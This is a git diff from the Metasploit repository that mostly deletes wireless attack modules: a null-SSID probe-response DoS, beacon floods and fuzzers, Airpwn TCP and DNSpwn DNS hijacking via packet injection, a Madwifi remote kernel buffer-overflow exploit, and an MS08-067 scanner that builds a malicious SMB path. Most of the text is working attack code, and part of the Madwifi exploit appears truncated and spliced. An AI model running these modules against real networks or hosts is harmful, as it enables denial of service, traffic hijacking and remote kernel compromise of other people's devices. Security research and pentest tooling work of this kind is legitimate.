-The internal pool links must be walked to figure out a possible cause of
-the problem, and then special pool applied to the suspect tags or the driver
-verifier to a suspect driver.
-Arguments:
-Arg1: 00000020, a pool block header size is corrupt.
-Arg2: 81cae7b0, The pool entry we were looking for within the page.
-Arg3: 81cae8c8, The next pool entry.
-Arg4: 0a23002b, (reserved)
-=end
diff --git a/modules/auxiliary/dos/wifi/probe_resp_null_ssid.rb b/modules/auxiliary/dos/wifi/probe_resp_null_ssid.rb
deleted file mode 100644
index ba35201cb6..0000000000
--- a/modules/auxiliary/dos/wifi/probe_resp_null_ssid.rb
+++ /dev/null
@@ -1,74 +0,0 @@ -## -# This module requires Metasploit: http//metasploit.com/download -# Current source: https://github.com/rapid7/metasploit-framework -## - - -require 'msf/core' - - -class Metasploit3 < Msf::Auxiliary - - include Msf::Exploit::Lorcon2 - include Msf::Auxiliary::Dos - - def initialize(info = {}) - super(update_info(info, - 'Name' => 'Multiple Wireless Vendor NULL SSID Probe Response', - 'Description' => %q{ - This module exploits a firmware-level vulnerability in a variety of - 802.11b devices. This attack works by sending a probe response frame - containing a NULL SSID information element to an affected device. This - flaw affects many cards based on the Choice MAC (Intersil, Lucent, Agere, - Orinoco, and the first generation of Airport cards). - }, - - 'Author' => [ 'hdm' ], - 'License' => MSF_LICENSE, - 'References' => - [ - ['URL', 'http://802.11ninja.net/papers/firmware_attack.pdf'], - ['WVE', '2006-0064'] - ] - )) - register_options( - [ - OptInt.new('COUNT', [ true, "The number of frames to send", 2000]), - OptString.new('ADDR_DST', [ true, "The MAC address of the target system"]) - ], self.class) - end - - def run - open_wifi - - cnt = datastore['COUNT'].to_i - - print_status("Creating malicious probe response frame...") - frame = create_frame() - - print_status("Sending #{cnt} frames...") - cnt.times { wifi.write(frame) } - end - - def create_frame - bssid = Rex::Text.rand_text(6) - seq = [rand(255)].pack('n') - caps = [rand(65535)].pack('n') - - frame = - "\x50" + # type/subtype - "\x00" + # flags - "\x00\x00" + # duration - eton(datastore['ADDR_DST']) + # dst - bssid + # src - bssid + # bssid - seq + # seq - Rex::Text.rand_text(8) + # timestamp value - Rex::Text.rand_text(2) + # beacon interval - Rex::Text.rand_text(2) + # capabilities - [0, 0].pack('CC') # Type=SSID(0) Length=0 - - return frame - - end -end 
diff --git a/modules/auxiliary/dos/wifi/ssidlist_beacon.rb b/modules/auxiliary/dos/wifi/ssidlist_beacon.rb deleted file mode 100644 index 66fad3d770..0000000000 --- a/modules/auxiliary/dos/wifi/ssidlist_beacon.rb +++ /dev/null 
@@ -1,108 +0,0 @@ -## -# This module requires Metasploit: http//metasploit.com/download -# Current source: https://github.com/rapid7/metasploit-framework -## - - -require 'msf/core' - - -class Metasploit3 < Msf::Auxiliary - - include Msf::Exploit::Lorcon - include Msf::Auxiliary::Dos - - def initialize(info = {}) - super(update_info(info, - 'Name' => 'Wireless Beacon SSID Emulator', - 'Description' => %q{ - This module sends out beacon frames using SSID's identified in a - specified file and randomly selected BSSID's. This is useful when - combined with a Karmetasploit attack to get clients configured to - not probe for networks in their PNL to start probing when they see a - matching SSID in from this script. For a list of common SSID's to - use with this script, check http://www.wigle.net/gps/gps/main/ssidstats. - If a file of SSID's is not specified, a default list of 20 SSID's will - be used. This script will run indefinitely until interrupted. - }, - - 'Author' => [ 'joswr1ght', 'hdm' ], - 'License' => MSF_LICENSE - )) - register_options( - [ - OptString.new('SSIDS_FILE', [ false, "Filename of SSID's to broadcast, one per line"]) - ], self.class) - end - - - def run - - @@uni = 0 - - frames = [] - - open_wifi - - ssidlist = [] - if datastore['SSIDS_FILE'] - begin - ssidfile = File.new(datastore['SSIDS_FILE'], "r") - rescue ::Exception - print_status("Couldn't read from \"#{datastore['SSIDS_FILE']}\": #{$!}") - return - end - ssidfile.each_line do |line| - ssidlist.push line.chomp - end - else - ssidlist = ["linksys", "default", "NETGEAR", "Belkin54g", "Wireless", - "WLAN", "home", "DLINK", "smc", "tsunami", "tmobile", "101", "panera", - "hhonors", "GlobalSuiteWireless", "Internet", "WiFi", "public", "guest", - "test"] - end - - print_status("Sending beacon frames...") - - while (true) - ssidlist.each do |ssid| - #print_status("Sending frame for SSID #{ssid}") - frame = create_frame(ssid) - wifi.write(frame) - end - end - end - - - def create_frame(ssid) - mtu 
= 1500 # 2312 # 1514 - ies = rand(1024) - - bssid = "0" + ssid[0..4] - seq = [rand(255)].pack('n') - - frame = - "\x80" + # type/subtype - "\x00" + # flags - "\x00\x00" + # duration - "\xff\xff\xff\xff\xff\xff" + # dst - bssid + # src - bssid + # bssid - seq + # seq - Rex::Text.rand_text(8) + # timestamp value - "\x64\x00" + # beacon interval - "\x04\x01" + # capability flags - - # ssid tag - "\x00" + ssid.length.chr + ssid + - - # supported rates - "\x01" + "\x08" + "\x82\x84\x8b\x96\x0c\x18\x30\x48" + - - # current channel - "\x03" + "\x01" + channel.chr - - return frame - - end -end diff --git a/modules/auxiliary/dos/wifi/wifun.rb b/modules/auxiliary/dos/wifi/wifun.rb deleted file mode 100644 index b6bc822bfb..0000000000 --- a/modules/auxiliary/dos/wifi/wifun.rb +++ /dev/null @@ -1,33 +0,0 @@ -## -# This module requires Metasploit: http//metasploit.com/download -# Current source: https://github.com/rapid7/metasploit-framework -## - - -require 'msf/core' - - -class Metasploit3 < Msf::Auxiliary - - include Msf::Exploit::Lorcon2 - include Msf::Auxiliary::Dos - - def initialize(info = {}) - super(update_info(info, - 'Name' => 'Wireless Test Module', - 'Description' => %q{ - This module is a test of the wireless packet injection system. - Please see external/ruby-lorcon/README for more information. - }, - - 'Author' => [ 'hdm' ], - 'License' => MSF_LICENSE - )) - end - - def run - open_wifi - wifi.write("X" * 1000) - end - -end diff --git a/modules/auxiliary/fuzzers/wifi/fuzz_beacon.rb b/modules/auxiliary/fuzzers/wifi/fuzz_beacon.rb deleted file mode 100644 index a31e89b589..0000000000 --- a/modules/auxiliary/fuzzers/wifi/fuzz_beacon.rb +++ /dev/null 
@@ -1,127 +0,0 @@ -## -# This module requires Metasploit: http//metasploit.com/download -# Current source: https://github.com/rapid7/metasploit-framework -## - - -require 'msf/core' - - -class Metasploit3 < Msf::Auxiliary - - include Msf::Exploit::Lorcon2 - include Msf::Auxiliary::Dos - - def initialize(info = {}) - super(update_info(info, - 'Name' => 'Wireless Beacon Frame Fuzzer', - 'Description' => %q{ - This module sends out corrupted beacon frames. - }, - - 'Author' => [ 'hdm' ], - 'License' => MSF_LICENSE - )) - register_options( - [ - OptString.new('ADDR_DST', [ true, "The MAC address of the target system",'FF:FF:FF:FF:FF:FF']), - OptString.new('PING_HOST', [ false, "Ping the wired address of the target host"]) - ], self.class) - end - - def ping_check - 1.upto(3) do |i| - x = `ping -c 1 -n #{datastore['PING_HOST']}` - return true if x =~ /1 received/ - if (i > 1) - print_status("Host missed a ping response...") - end - end - return false - end - - def run - - srand(0) - - @@uni = 0 - - frames = [] - - open_wifi - - print_status("Sending corrupt frames...") - - while (true) - frame = create_frame() - - if (datastore['PING_HOST']) - - if (frames.length >= 5) - frames.shift - frames.push(frame) - else - frames.push(frame) - end - - 1.upto(3) do - wifi.write(frame) - if (not ping_check()) - frames.each do |f| - print_status "****************************************" - print_status f.inspect - end - return - end - end - else - wifi.write(frame) - end - end - end - - - def create_frame - mtu = 1500 # 2312 # 1514 - ies = rand(1024) - - ssid = Rex::Text.rand_text_alphanumeric(rand(256)) - bssid = Rex::Text.rand_text(6) - seq = [rand(255)].pack('n') - - frame = - "\x80" + # type/subtype - "\x00" + # flags - "\x00\x00" + # duration - eton(datastore['ADDR_DST']) + # dst - bssid + # src - bssid + # bssid - seq + # seq - Rex::Text.rand_text(8) + # timestamp value - "\x64\x00" + # beacon interval - #"\x00\x05" + # capability flags - Rex::Text.rand_text(2) + - - # ssid 
tag - "\x00" + ssid.length.chr + ssid + - - # supported rates - "\x01" + "\x08" + "\x82\x84\x8b\x96\x0c\x18\x30\x48" + - - # current channel - "\x03" + "\x01" + channel.chr - - 1.upto(ies) do |i| - max = mtu - frame.length - break if max < 2 - t = rand(256) - l = (max - 2 == 0) ? 0 : (max > 255) ? rand(255) : rand(max - 1) - d = Rex::Text.rand_text(l) - frame += t.chr + l.chr + d - end - - return frame - - end - -end diff --git a/modules/auxiliary/fuzzers/wifi/fuzz_proberesp.rb b/modules/auxiliary/fuzzers/wifi/fuzz_proberesp.rb deleted file mode 100644 index 114fc89c4a..0000000000 --- a/modules/auxiliary/fuzzers/wifi/fuzz_proberesp.rb +++ /dev/null 
@@ -1,126 +0,0 @@ -## -# This module requires Metasploit: http//metasploit.com/download -# Current source: https://github.com/rapid7/metasploit-framework -## - - -require 'msf/core' - - -class Metasploit3 < Msf::Auxiliary - - include Msf::Exploit::Lorcon2 - include Msf::Auxiliary::Dos - - def initialize(info = {}) - super(update_info(info, - 'Name' => 'Wireless Probe Response Frame Fuzzer', - 'Description' => %q{ - This module sends out corrupted probe response frames. - }, - - 'Author' => [ 'hdm' ], - 'License' => MSF_LICENSE - )) - register_options( - [ - OptString.new('ADDR_DST', [ true, "The MAC address of the target system",'FF:FF:FF:FF:FF:FF']), - OptString.new('PING_HOST', [ false, "Ping the wired address of the target host"]) - ], self.class) - end - - def ping_check - 1.upto(3) do |i| - x = `ping -c 1 -n #{datastore['PING_HOST']}` - return true if x =~ /1 received/ - if (i > 1) - print_status("Host missed a ping response...") - end - end - return false - end - - def run - - srand(0) - - @@uni = 0 - - frames = [] - - open_wifi - - print_status("Sending corrupt frames...") - - while (true) - frame = create_frame() - - if (datastore['PING_HOST']) - - if (frames.length >= 5) - frames.shift - frames.push(frame) - else - frames.push(frame) - end - - 1.upto(10) do - wifi.write(frame) - if (not ping_check()) - frames.each do |f| - print_status "****************************************" - print_status f.inspect - end - return - end - end - else - wifi.write(frame) - end - end - end - - def create_frame - mtu = 500 - ies = rand(1024) - - bssid = Rex::Text.rand_text(6) - seq = [rand(255)].pack('n') - - frame = - "\x50" + # type/subtype - "\x00" + # flags - "\x00\x00" + # duration - eton(datastore['ADDR_DST']) + # dst - bssid + # src - bssid + # bssid - seq + # seq - Rex::Text.rand_text(8) + # timestamp value - Rex::Text.rand_text(2) + # beacon interval - Rex::Text.rand_text(2) # capability flags - - ssid = Rex::Text.rand_text_alphanumeric(rand(256)) - - # ssid tag - 
frame << "\x00" + ssid.length.chr + ssid - - # supported rates - frame << "\x01" + "\x08" + "\x82\x84\x8b\x96\x0c\x18\x30\x48" - - # current channel - frame << "\x03" + "\x01" + channel.chr - - 1.upto(ies) do |i| - max = mtu - frame.length - break if max < 2 - t = rand(256) - l = (max - 2 == 0) ? 0 : (max > 255) ? rand(255) : rand(max - 1) - d = Rex::Text.rand_text(l) - frame += t.chr + l.chr + d - end - - return frame - - end - -end diff --git a/modules/auxiliary/scanner/http/oracle_demantra_database_credentials_leak.rb b/modules/auxiliary/scanner/http/oracle_demantra_database_credentials_leak.rb index 979cac2ad8..3944373f8f 100644 --- a/modules/auxiliary/scanner/http/oracle_demantra_database_credentials_leak.rb +++ b/modules/auxiliary/scanner/http/oracle_demantra_database_credentials_leak.rb @@ -53,7 +53,7 @@ class Metasploit3 < Msf::Auxiliary }) if res.nil? or res.body.empty? - vprint_error("#{peer} - No content retrieved from") + vprint_error("#{peer} - No content retrieved") return end diff --git a/modules/auxiliary/scanner/smb/ms08_067_check.rb b/modules/auxiliary/scanner/smb/ms08_067_check.rb deleted file mode 100644 index 34eb524d3a..0000000000 --- a/modules/auxiliary/scanner/smb/ms08_067_check.rb +++ /dev/null 
@@ -1,120 +0,0 @@ -## -# This module requires Metasploit: http//metasploit.com/download -# Current source: https://github.com/rapid7/metasploit-framework -## - -require "msf/core" -require 'msf/core/module/deprecated' - -class Metasploit4 < Msf::Auxiliary - - include Msf::Exploit::Remote::DCERPC - include Msf::Exploit::Remote::SMB - include Msf::Auxiliary::Scanner - include Msf::Auxiliary::Report - include Msf::Module::Deprecated - deprecated Date.new(2014, 2, 26), "exploit/windows/smb/ms08_067_netapi" - - def initialize(info = {}) - super(update_info(info, - 'Name' => "MS08-067 Scanner", - 'Description' => %q{ - This module uses the check in ms08_067_netapi to scan for MS08-067. - }, - 'Author' => [ - "hdm", # with tons of input/help/testing from the community - "Brett Moore ", - "frank2 ", # check() detection - "jduck", # XP SP2/SP3 AlwaysOn DEP bypass - "sho-luv", # Original module - "wvu" # Refactor and cleanup - ], - 'References' => [ - ["CVE", "2008-4250"], - ["OSVDB", "49243"], - ["MSB", "MS08-067"], - # If this vulnerability is found, ms08-67 is exposed as well - ["URL", "http://www.rapid7.com/vulndb/lookup/dcerpc-ms-netapi-netpathcanonicalize-dos"] - ], - 'License' => MSF_LICENSE - )) - - register_options([ - OptString.new("SMBPIPE", [true, "The pipe name to use (BROWSER, SRVSVC)", "BROWSER"]) - ], self.class) - end - - def run_host(ip) - case check_vuln - when Msf::Exploit::CheckCode::Vulnerable - print_good("#{ip}:#{rport} - MS08-067 VULNERABLE") - report_vuln({ - :host => ip, - :name => "MS08-067", - :info => "Vulnerability in Server service could allow remote code execution", - :refs => self.references - }) - when Msf::Exploit::CheckCode::Safe - vprint_status("#{ip}:#{rport} - MS08-067 SAFE") - when Msf::Exploit::CheckCode::Unknown - vprint_status("#{ip}:#{rport} - MS08-067 UNKNOWN") - end - end - - def check_vuln - begin - connect() - smb_login() - rescue Rex::Proto::SMB::Exceptions::LoginError - return Msf::Exploit::CheckCode::Unknown - end - - # - # 
Build the malicious path name - # 5b878ae7 "db @eax;g" - prefix = "\\" - path = - "\x00\\\x00/"*0x10 + - Rex::Text.to_unicode("\\") + - Rex::Text.to_unicode("R7") + - Rex::Text.to_unicode("\\..\\..\\") + - Rex::Text.to_unicode("R7") + - "\x00"*2 - - server = Rex::Text.rand_text_alpha(rand(8)+1).upcase - - handle = dcerpc_handle( '4b324fc8-1670-01d3-1278-5a47bf6ee188', '3.0', - 'ncacn_np', ["\\#{datastore['SMBPIPE']}"] - ) - - begin - # Samba doesn't have this handle and returns an ErrorCode - dcerpc_bind(handle) - rescue Rex::Proto::SMB::Exceptions::ErrorCode - return Msf::Exploit::CheckCode::Safe - end - - stub = - NDR.uwstring(server) + - NDR.UnicodeConformantVaryingStringPreBuilt(path) + - NDR.long(8) + - NDR.wstring(prefix) + - NDR.long(4097) + - NDR.long(0) - - resp = dcerpc.call(0x1f, stub) - error = resp[4,4].unpack("V")[0] - - # Cleanup - simple.client.close - simple.client.tree_disconnect - disconnect - - if (error == 0x0052005c) # \R :) - return Msf::Exploit::CheckCode::Vulnerable - else - return Msf::Exploit::CheckCode::Safe - end - end - -end diff --git a/modules/auxiliary/spoof/wifi/airpwn.rb b/modules/auxiliary/spoof/wifi/airpwn.rb deleted file mode 100644 index 6d18979193..0000000000 --- a/modules/auxiliary/spoof/wifi/airpwn.rb +++ /dev/null 
@@ -1,194 +0,0 @@ -## -# This module requires Metasploit: http//metasploit.com/download -# Current source: https://github.com/rapid7/metasploit-framework -## - -require 'msf/core' -require 'yaml' - -class Metasploit3 < Msf::Auxiliary - - include Msf::Exploit::Capture - include Msf::Exploit::Lorcon2 - include Msf::Auxiliary::Report - - def initialize - super( - 'Name' => 'Airpwn TCP Hijack', - 'Description' => %q{ - TCP streams are 'protected' only in so much as the sequence - number is not guessable. - - Wifi is shared media. - - Got your nose. - - Responses which do not begin with Header: Value assumed to be - HTML only and will have Header:Value data prepended. Responses - which do not include a Content-Length header will have one generated. - }, - 'Author' => ['toast', 'dragorn', 'ddz', 'hdm'], - 'License' => MSF_LICENSE, - 'Actions' => - [ - [ 'Airpwn' ] - ], - 'PassiveActions' => - [ - 'Capture' - ], - 'DefaultAction' => 'Airpwn' - ) - - register_options( - [ - OptPath.new('SITELIST', [ false, "YAML file of URL/Replacement pairs for GET replacement", - File.join(Msf::Config.data_directory, "exploits", "wifi", "airpwn", "sitelist.yml") - ]), - OptBool.new('USESITEFILE', [ true, "Use site list file for match/response", "false"]), - OptString.new('FILTER', [ true, "Default BPF filter", "port 80"]), - OptString.new('MATCH', [ true, "Default request match", "GET ([^ ?]+) HTTP" ]), - OptString.new('RESPONSE', [ true, "Default response", "Airpwn" ]), - ], self.class) - end - - def run - - @sitelist = datastore['SITELIST'] - @regex = datastore['MATCH'] - @response = datastore['RESPONSE'] - @filter = datastore['FILTER'] - @useyaml = datastore['USESITEFILE'] - - @http = [] - - if @useyaml then - begin - @http = YAML::load_file(@sitelist) - - rescue ::Exception => e - print_error "AIRPWN: failed to parse YAML file, #{e.class} #{e} #{e.backtrace}" - end - else - @http[0] = { "regex" => [@regex], "response" => @response } - end - - @run = true - - print_status "AIRPWN: 
Parsing responses and defining headers" - - # Prep the responses - @http.each do |r| - if not r["response"] then - if not r["file"] then - print_error "AIRPWN: Missing 'response' or 'file' in yaml config" - r["txresponse"] = "" - else - r["txresponse"] = "" - begin - File.open(r["file"], "rb") do |io| - r["txresponse"] += io.read(4096) - end - rescue EOFError - rescue ::Exception => e - print_error("AIRPWN: failed to parse response file " + - "#{r['file']}, #{e.class} #{e} #{e.backtrace}") - end - end - else - if r["file"] then - print_error "AIRPWN: Both 'response' and 'file' in yaml config, " + - "defaulting to 'response'" - end - - r["txresponse"] = r["response"] - end - - # If we have headers - if r["txresponse"].scan(/[^:?]+: .+\n/m).size > 0 - # But not a content-length - if r["txresponse"].scan(/^Content-Length: /).size == 0 - # Figure out the length and add it - loc = (/\n\n/m =~ r["txresponse"]) - if loc == nil - print_status "AIRPWN: Response packet looks like HTTP headers but can't find end of headers. Will inject as-is." - else - print_status "AIRPWN: Response packet looks like HTTP headers but has no Content-Length, adding one." - r["txresponse"].insert(loc, "\r\nContent-Length: " + (r["response"].length - loc).to_s) - end - end - else - # We have no headers, generate a response - print_status "AIRPWN: Response packet has no HTTP headers, creating some." - r["txresponse"].insert(0, "HTTP/1.1 200 OK\r\nDate: %s\r\nServer: Apache\r\nConnection: close\r\nContent-Type: text/html\r\nContent-Length: %d\r\n\r\n" % [Time.now, @response.size]) - end - end - - print_status "Opening wifi module." - open_wifi - - self.wifi.filter = @filter if (@filter != "") - each_packet do |pkt| - - d3 = pkt.dot3 - - next if not d3 - p = PacketFu::Packet.parse(d3) rescue nil - next unless p.is_tcp? - - @http.each do |r| - hit = nil - r['regex'].each do |reg| - hit = p.payload.scan(/#{reg}/) || nil - break if hit.size != 0 - end - next if hit.size.zero? 
- - print_status("AIRPWN: %s -> %s HTTP GET [%s] TCP SEQ %u" % [p.ip_saddr, p.ip_daddr, $1, p.tcp_seq]) - - injpkt = Lorcon::Packet.new() - injpkt.bssid = pkt.bssid - - response_pkt = PacketFu::TCPPacket.new - response_pkt.eth_daddr = p.eth_saddr - response_pkt.eth_saddr = p.eth_daddr - response_pkt.ip_saddr = p.ip_daddr - response_pkt.ip_daddr = p.ip_saddr - response_pkt.ip_ttl = p.ip_ttl - response_pkt.tcp_sport = p.tcp_dport - response_pkt.tcp_dport = p.tcp_sport - response_pkt.tcp_win = p.tcp_win - response_pkt.tcp_seq = p.tcp_ack - response_pkt.tcp_ack = (p.tcp_seq + p.ip_header.body.to_s.size - (p.tcp_hlen * 4)) & 0xffffffff - response_pkt.tcp_flags.ack = 1 - response_pkt.tcp_flags.psh = 1 - response_pkt.payload = r["txresponse"] - response_pkt.recalc - injpkt.dot3 = response_pkt.to_s - - case pkt.direction - when ::Lorcon::Packet::LORCON_FROM_DS - injpkt.direction = Lorcon::Packet::LORCON_TO_DS - when ::Lorcon::Packet::LORCON_TO_DS - injpkt.direction = Lorcon::Packet::LORCON_FROM_DS - else - injpkt.direction = Lorcon::Packet::LORCON_ADHOC_DS - end - - self.wifi.inject(injpkt) or print_error("AIRPWN failed to inject packet: " + tx.error) - - response_pkt.tcp_seq = response_pkt.tcp_seq + response_pkt.payload.size - response_pkt.tcp_flags.ack = 1 - response_pkt.tcp_flags.psh = 0 - response_pkt.tcp_flags.fin = 1 - response_pkt.payload = 0 - response_pkt.recalc - - injpkt.dot3 = response_pkt.to_s - self.wifi.inject(injpkt) or print_error("AIRPWN failed to inject packet: " + tx.error) - end - end - - end - -end diff --git a/modules/auxiliary/spoof/wifi/dnspwn.rb b/modules/auxiliary/spoof/wifi/dnspwn.rb deleted file mode 100644 index e0699f90c1..0000000000 --- a/modules/auxiliary/spoof/wifi/dnspwn.rb +++ /dev/null 
@@ -1,120 +0,0 @@ -## -# This module requires Metasploit: http//metasploit.com/download -# Current source: https://github.com/rapid7/metasploit-framework -## - -require 'msf/core' -require 'yaml' -require 'net/dns/packet' - -class Metasploit3 < Msf::Auxiliary - - include Msf::Exploit::Capture - include Msf::Exploit::Lorcon2 - include Msf::Auxiliary::Report - - def initialize - super( - 'Name' => 'DNSpwn DNS Hijack', - 'Description' => %q{ - Race DNS responses and replace DNS queries - }, - 'Author' => ['dragorn'], - 'License' => MSF_LICENSE - ) - - register_options( - [ - OptPath.new('DNSLIST', [ false, "YAML file of DNS entries for replacement", - File.join(Msf::Config.data_directory, "exploits", "wifi", "dnspwn", "dnslist.yml") - ]), - OptBool.new('USEDNSFILE', [ true, "Use dns list file for response", "false"]), - OptString.new('FILTER', [ true, "Default BPF filter", "port 53"]), - OptString.new('IP', [ true, "IP for host resolution", "1.2.3.4" ]), - OptString.new('DURATION', [ true, "Duration of spoofed IP record", "99999" ]), - OptString.new('MATCH', [ true, "Match for DNS name replacement", "(.*)"]), - ], self.class) - end - - def run - - @dnslist = datastore['DNSLIST'] - @regex = datastore['MATCH'] - @response = datastore['IP'] - @filter = datastore['FILTER'] - @duration = datastore['DURATION'] - @useyaml = datastore['USEDNSFILE'] - - @dns = [] - - if @useyaml - begin - @dns = YAML::load_file(@dnslist) - rescue ::Exception => e - print_error "DNSPWN: failed to parse YAML file, #{e.class} #{e} #{e.backtrace}" - end - else - @dns[0] = { "regex" => @regex, "response" => @response, "duration" => @duration } - end - - @run = true - - open_wifi - - self.wifi.filter = @filter if not @filter.empty? - each_packet do |pkt| - d3 = pkt.dot3 - - next if not d3 - p = PacketFu::Packet.parse(d3) rescue nil - next unless p.is_udp? 
- - dns = Net::DNS::Packet::parse(p.payload) rescue nil - next unless dns - - next if dns.answer.size != 0 - next if dns.question.size == 0 - - @dns.each do |r| - hit = nil - r['regex'].each do |reg| - hit = dns.question[0].qName.scan(/#{reg}/) || nil - break if hit.size != 0 - end - next if hit.size.zero? - - print_status("DNSPWN: %s -> %s req %s transaction id %u (response %s)" % [p.ip_saddr, p.ip_daddr, dns.header.id, r["response"] ]) - - injpkt = Lorcon::Packet.new() - injpkt.bssid = pkt.bssid - - response_pkt = PacketFu::UDPPacket.new - response_pkt.eth_daddr = p.eth_saddr - response_pkt.eth_saddr = p.eth_daddr - response_pkt.ip_saddr = p.ip_daddr - response_pkt.ip_daddr = p.ip_saddr - response_pkt.ip_ttl = p.ip_ttl - response_pkt.udp_sport = p.udp_dport - response_pkt.udp_dport = p.udp_sport - - dns.header.qr = 1 - dns.answer = Net::DNS::RR::A.new("%s %s IN A %s", dns.question[0].qName, r["duration"], r["response"]) - - response_pkt.payload = dns.data - response_pkt.recalc - - injpkt.dot3 = response_pkt.to_s - - if (pkt.direction == Lorcon::Packet::LORCON_FROM_DS) - injpkt.direction = Lorcon::Packet::LORCON_TO_DS - elsif (pkt.direction == Lorcon::Packet::LORCON_TO_DS) - injpkt.direction = Lorcon::Packet::LORCON_FROM_DS - else - injpkt.direction = Lorcon::Packet::LORCON_ADHOC_DS - end - - self.wifi.inject(injpkt) or print_error("DNSPWN failed to inject packet: " + tx.error) - end - end - end -end diff --git a/modules/exploits/linux/madwifi/madwifi_giwscan_cb.rb b/modules/exploits/linux/madwifi/madwifi_giwscan_cb.rb deleted file mode 100644 index f75f54a916..0000000000 --- a/modules/exploits/linux/madwifi/madwifi_giwscan_cb.rb +++ /dev/null 
@@ -1,378 +0,0 @@ -## -# This module requires Metasploit: http//metasploit.com/download -# Current source: https://github.com/rapid7/metasploit-framework -## - -# Madwifi remote kernel exploit -# 100% reliable, doesn't crash wifi stack, can exploit -# same target multiple times -# -# Julien TINNES -# Laurent BUTTI <0x9090 at gmail.com> -# -# vuln in giwscan_cb, here's the path: -# -# ieee80211_ioctl_giwscan -> ieee80211_scan_iterate -> sta_iterate -> giwscan_cb -# - -require 'msf/core' -require 'metasm' - -class Metasploit3 < Msf::Exploit::Remote - Rank = AverageRanking - - include Msf::Exploit::Lorcon2 - - def initialize(info = {}) - super(update_info(info, - 'Name' => 'Madwifi SIOCGIWSCAN Buffer Overflow', - 'Description' => %q{ - The Madwifi driver under Linux is vulnerable to a remote kernel-mode - stack-based buffer overflow. - - The vulnerability is triggered by one of these properly crafted - information element: WPA, RSN, WME and Atheros OUI Current madwifi - driver (0.9.2) and and all madwifi-ng drivers since r1504 are - vulnerable - - Madwifi 0.9.2.1 release corrects the issue. - - This module has been tested against Ubuntu 6.10 and is 100% reliable, - doesn\'t crash the Wifi stack and can exploit the same machine multiple - time without the need to reboot it. - - This module depends on the Lorcon2 library and only works on the Linux - platform with a supported wireless card. Please see the Ruby Lorcon2 - documentation (external/ruby-lorcon/README) for more information. 
- }, - 'Author' => - [ - 'Julien Tinnes ', - 'Laurent Butti <0x9090 at gmail.com>' - ], - 'License' => MSF_LICENSE, - 'References' => - [ - ['CVE', '2006-6332'], - ['OSVDB', '31267'], - ['URL', 'http://www.madwifi.org'] - ], - #'Stance' => Msf::Exploit::Stance::Passive, - 'Platform' => 'linux', - 'Arch' => [ ARCH_X86 ], - 'Payload' => - { - #'Space' => 65, - # Metasploit doesn't support dynamic size payloads - # so we will handle this in metasm instead and ask for - # the smaller payload possible - #'Encoder' => Msf::Encoder::Type::Raw, - 'DisableNops' => true - }, - 'Targets' => - [ - [ 'Ubuntu 6.10', - { - 'JMPESP' => 0xffffe777, - 'scan_iterate_ra' => "0x8014401" - } - ], - - [ 'Generic (you need non randomized vdso)', - { - 'JMPESP' => 0xffffe777, - 'scan_iterate_ra' => nil - } - ] - ], - 'DisclosureDate' => 'Dec 08 2006' - )) - - register_options( - [ - OptBool.new('SINGLESHOT', [ true, "Break after first victim (for msfcli)", 'false']), - OptString.new('SSID', [ true, "The SSID of the emulated access point", 'test']), - OptInt.new('RUNTIME', [ true, "The number of seconds to run the attack", 600]), - OptInt.new('LENGTH', [ true, "Length after local variables in giwscan_cb() to overwrite", 24]), - OptString.new('ADDR_DST', [ true, "The MAC address of the target system", 'FF:FF:FF:FF:FF:FF']), - ], self.class) - end - - def exploit - open_wifi - - #puts "kikoo " + payload.encoded.inspect - #puts payload.encoded.to_s.unpack('C*').map { |i| i.to_s 16 }.join(',') - - stime = Time.now.to_i - rtime = datastore['RUNTIME'].to_i - count = 0 - - print_status("Shellcode size is: #{payload.encoded.length} bytes") - print_status("Creating malicious beacon frame...") - - frame = create_beacon() - - print_status("Sending malicious beacon frames for #{datastore['RUNTIME']} seconds...") - - while (stime + rtime > Time.now.to_i) - wifi.write(frame) - select(nil, nil, nil, 0.10) if (count % 100 == 0) - count += 1 - break if session_created? 
and datastore['SINGLESHOT'] - end - - print_status("Completed sending #{count} beacons.") - end - - - def create_beacon - - ssid = datastore['SSID'].to_s - bssid = Rex::Text.rand_text(6) - channel = datastore['CHANNEL'].to_i - len = datastore['LENGTH'].to_i - seq = [rand(255)].pack('n') - jmpesp = target['JMPESP'] # jmp esp in vdso - - # address just after the call (in ieee80211_scan_iterate in wlan.ko) - scan_iterate_ra=target['scan_iterate_ra'] - - if scan_iterate_ra - howtoreturn = "RETURN_PROPERLY" # Return to the parent of giwscan_cb parent - else - howtoreturn = "RETURN_BADLY" # Return to userland with IRET - end - - bssiwlist = 0x0804ddd0 - - stacksize = "STACK_8K" - getregs = "CALCULATE" - #getregs = "IWANTTOSCANMANUALLY" - reg_cs = "0x73" - reg_ss = "0x7b" - - wiframe = Metasm::Shellcode.assemble Metasm::Ia32.new, <(('172.24.94.252'.split('.').reverse.inject(0) { |ip, byte| (ip << 8) | byte.to_i }) ^ 0xffffffff) - - #puts value[-10..-1].unpack('C*').map { |i| i.to_s 16 }.join(',') - - if (len == 24 and value.length != 198) - fail_with(Failure::BadConfig, "Value is too big! #{value.length}") - end - - buf = "\xdd" + value.length.chr + value - - frame = - "\x80" + # type/subtype - "\x00" + # flags - "\x00\x00" + # duration - eton(datastore['ADDR_DST']) + # dst - bssid + # src - bssid + # bssid - seq + # seq - Rex::Text.rand_text(8) + # timestamp value - "\x64\x00" + # beacon interval - "\x01\x00" + # capabilities - - # ssid IE - "\x00" + ssid.length.chr + ssid + - - # supported rates IE - "\x01\x08\x82\x84\x8b\x96\x0c\x18\x30\x48" + - - # channel IE - "\x03" + "\x01" + channel.chr + - - # invalid wpa IE buffer overflow - # wpa ie is an example, still valid for other IEs - buf - - return frame - end - -end diff --git a/modules/exploits/windows/browser/ms14_012_cmarkup_uaf.rb b/modules/exploits/windows/browser/ms14_012_cmarkup_uaf.rb index 27350a62ca..86be4d034d 100644 --- a/modules/exploits/windows/browser/ms14_012_cmarkup_uaf.rb 
+++ b/modules/exploits/windows/browser/ms14_012_cmarkup_uaf.rb @@ -15,8 +15,8 @@ class Metasploit3 < Msf::Exploit::Remote 'Name' => "MS14-012 Microsoft Internet Explorer CMarkup Use-After-Free", 'Description' => %q{ This module exploits an use after free condition on Internet Explorer as used in the wild - on the "Operation SnowMan" in February 2014. The module uses Flash Player 12 in order to - bypass ASLR and finally DEP. + as part of "Operation SnowMan" in February 2014. The module uses Flash Player 12 in order to + bypass ASLR and DEP. }, 'License' => MSF_LICENSE, 'Author' => diff --git a/modules/exploits/windows/driver/broadcom_wifi_ssid.rb b/modules/exploits/windows/driver/broadcom_wifi_ssid.rb deleted file mode 100644 index cd79410a86..0000000000 --- a/modules/exploits/windows/driver/broadcom_wifi_ssid.rb +++ /dev/null 
